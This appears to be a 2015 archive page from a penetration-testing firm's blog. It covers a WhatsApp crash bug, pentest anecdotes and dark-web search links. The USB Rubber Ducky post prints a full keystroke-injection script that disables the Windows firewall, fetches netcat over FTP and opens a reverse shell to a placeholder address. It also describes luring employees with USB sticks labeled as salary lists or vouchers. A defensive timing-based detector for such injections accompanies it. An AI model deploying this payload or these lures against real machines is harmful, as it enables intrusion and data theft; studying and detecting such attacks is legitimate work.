Archive for December, 2015


December 29, 2015

WhatsApp Denial of Service :-)

Author: Martin Voelk
December 24, 2015

As exploit developers will know, fuzzing and crashing an application is an integral part of exploit development. Whilst this WhatsApp bug may “only” crash the app, it may be possible to develop it further into a full exploit of the underlying platform.

This one is funny, as it allows people to crash other people’s WhatsApp applications just by sending enough smileys 🙂 A very Merry Christmas everyone and a happy New Year, and don’t send your friends too many smileys with your Christmas wishes 🙂


December 23, 2015

Some customers think that the USB threat may have gone away after Windows 7, where autoplay/autorun is disabled by default. While this is true for most standard USB attack vectors, it doesn’t apply to USB Rubber Ducky attacks.

What’s the difference?

The USB Rubber Ducky attack differs in that it doesn’t execute an .exe or similar file; instead it emulates an external keyboard, which AV or endpoint protection does not flag as malicious activity or as a virus. It’s like plugging in an external keyboard, but rather than a user typing the commands, the Rubber Ducky types a pre-programmed set of commands.

The following raw Duckyscript (prior to compiling) simply connects to an FTP server, downloads Netcat and then sends a shell to a specified IP address and port where a listener is waiting.

DELAY 10000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING cd %USERPROFILE%
ENTER
DELAY 100
STRING netsh firewall set opmode disable
ENTER
DELAY 2000
STRING echo open ftp.something.com 21 > ftp.txt
ENTER
DELAY 100
STRING echo user@something.com>> ftp.txt
ENTER
DELAY 100
STRING echo password>> ftp.txt
ENTER
DELAY 100
STRING echo bin >> ftp.txt
ENTER
DELAY 100
STRING echo get nc.exe >> ftp.txt
ENTER
DELAY 100
STRING echo bye >> ftp.txt
ENTER
DELAY 100
STRING ftp -s:ftp.txt
ENTER
STRING del ftp.txt & exit
ENTER
DELAY 2000
GUI r
DELAY 200
STRING nc -nv X.X.X.X 3333 -e cmd.exe
ENTER
DELAY 2000
GUI r
DELAY 200
STRING cmd
ENTER
DELAY 600
STRING exit
ENTER

We were recently engaged by a Fortune 500 company for a pentest. They had sound defenses in place, yet their laptops were compromised that way and a lot of juicy information could be harvested. FireEye, McAfee ePO and all the endpoint defenses they had in place couldn’t stop users plugging in a Rubber Ducky. Especially not when the Rubber Ducky is labeled “CEO salaries 2015”, “free Amazon vouchers” or “free Expedia vouchers”. 8 out of 10 USBs were plugged in and 8 out of 10 shells were received.

The company has security in place and employees are taught not to plug in unknown devices, but hey… curiosity and the opportunity to gain something for free beat any security policy…
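One defensive check follows directly from the keyboard-emulation point above: a keystroke-injection device types at machine speed, so inter-keystroke timing alone separates it from a person at the keyboard. The Python below is an added example written for this post, not the blog’s or Hak5’s code; the event format, the device names and the 30 ms / 20-key thresholds are assumptions, and the keystroke capture it analyses is constructed inline.

```python
from dataclasses import dataclass

# Thresholds are assumptions for this example: a human typist rarely sustains
# inter-key gaps under ~30 ms, while an HID injector emits one key every few ms.
HUMAN_MIN_GAP_MS = 30.0
BURST_MIN_KEYS = 20


@dataclass
class KeyEvent:
    t_ms: float    # milliseconds since the capture started
    key: str       # character produced by the keystroke
    device: str    # HID device name as the OS reports it (constructed here)


@dataclass
class Burst:
    device: str
    start_ms: float
    end_ms: float
    keys: int
    text: str      # what the suspected injector typed


def _to_burst(run):
    return Burst(run[0].device, run[0].t_ms, run[-1].t_ms, len(run),
                 "".join(e.key for e in run))


def find_injection_bursts(events, min_gap_ms=HUMAN_MIN_GAP_MS,
                          min_keys=BURST_MIN_KEYS):
    """Return each run of at least min_keys consecutive keystrokes from one
    device in which every gap between neighbouring keys is below min_gap_ms."""
    by_device = {}
    for e in sorted(events, key=lambda e: e.t_ms):
        by_device.setdefault(e.device, []).append(e)

    bursts = []
    for evs in by_device.values():
        run = [evs[0]]
        for prev, cur in zip(evs, evs[1:]):
            if cur.t_ms - prev.t_ms < min_gap_ms:
                run.append(cur)
            else:
                if len(run) >= min_keys:
                    bursts.append(_to_burst(run))
                run = [cur]
        if len(run) >= min_keys:
            bursts.append(_to_burst(run))
    return bursts


def build_sample_events():
    """Constructed capture, not real data: a person types a short phrase on the
    built-in keyboard, then a second HID device types a command at machine speed."""
    events = []
    t = 0.0
    for i, ch in enumerate("meeting notes"):
        t += 120.0 + (i % 4) * 35.0   # 120-225 ms gaps, human-like
        events.append(KeyEvent(t, ch, "Logitech USB Keyboard"))
    t += 3000.0                       # idle pause before the second device appears
    for ch in "netsh firewall set opmode disable":
        t += 6.0                      # 6 ms per key, far below human cadence
        events.append(KeyEvent(t, ch, "HID Keyboard Device"))
    return events


if __name__ == "__main__":
    for b in find_injection_bursts(build_sample_events()):
        print(f"ALERT {b.device}: {b.keys} keys in {b.end_ms - b.start_ms:.0f} ms "
              f"-> {b.text!r}")
```

Grouping by device matters: the injected text arrives from a freshly enumerated keyboard, so the alert can carry the device name and the typed text for the analyst, and the human’s own keyboard never trips the threshold even while the burst is in progress.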

For folks interested in the USB rubber ducky, here is the link:
http://hakshop.myshopify.com/collections/usb-rubber-ducky/products/usb-rubber-ducky-deluxe?variant=353378649


5 most scary Pentests of 2015

Author: Martin Voelk
December 18, 2015

2015 was a great year with a lot of new customers and exciting projects. We often get asked what sort of information we are able to retrieve in a typical penetration testing engagement with customers. The answer is: scary stuff! We have compiled a small list of the top 5 ethical breaches on our 2015 engagements.

Customer 1

This customer is an airport and asked us to do a full-scale penetration test. The scariest part was being able to control all CCTV, alarm systems and sprinkler systems. It was challenging, but by pivoting through a lot of different networks we were able to gain full control. Needless to say, management was impressed and scared at the same time.

Customer 2

This customer from the retail space already had hardened defenses in place, so we turned our attention towards individual board members. Social engineering allowed us to obtain very sensitive information from top-ranking CXOs. The customer was speechless and has since employed new strategies to tackle social engineering attacks.

Customer 3

A customer who suspected they had been hacked engaged us for forensic analysis. We discovered a full-scale breach where attackers had set up RSPAN sessions to mirror almost all traffic out to an attacking server via a VPN. We don’t often see such sophisticated attacks, but all their traffic had been eavesdropped on for almost 2 months.

Customer 4

Ransomware. CryptoWall. Nothing special really, except that it was the laptop of a high-net-worth CEO. We always recommend NOT paying the ransom. Fortunately he had a lot of Microsoft restore points and we were able to recover a clean point with only a few days of lost data.

Customer 5

A financial client who runs a high-profile subscription service for clients. They noticed that subscription rates had dwindled over the months and suspected a breach. They engaged us to investigate. We found username and login pairs for the expensive service on the Dark Web and pastebin.com. The client has since moved to a two-factor authentication mechanism.


Dark Web Search Engines

Author: Martin Voelk
December 16, 2015

So after many months of inactivity, we will resume blogging. Sorry for the absence, but we were just too busy with pentests and security work.

Today, we would like to introduce a search engine which allows you to search the dark web from the clear web.

http://www.onion.link


Boarding Pass

Author: Doree Garcia
December 16, 2015

Apparently You Should Never Throw Away Your Boarding Pass. The Reason Why? I Had No Idea!

http://blog.auntyacid.com/apparently-you-should-never-throw-away-your-boarding-pass-the-reason-why-i-had-no-idea/
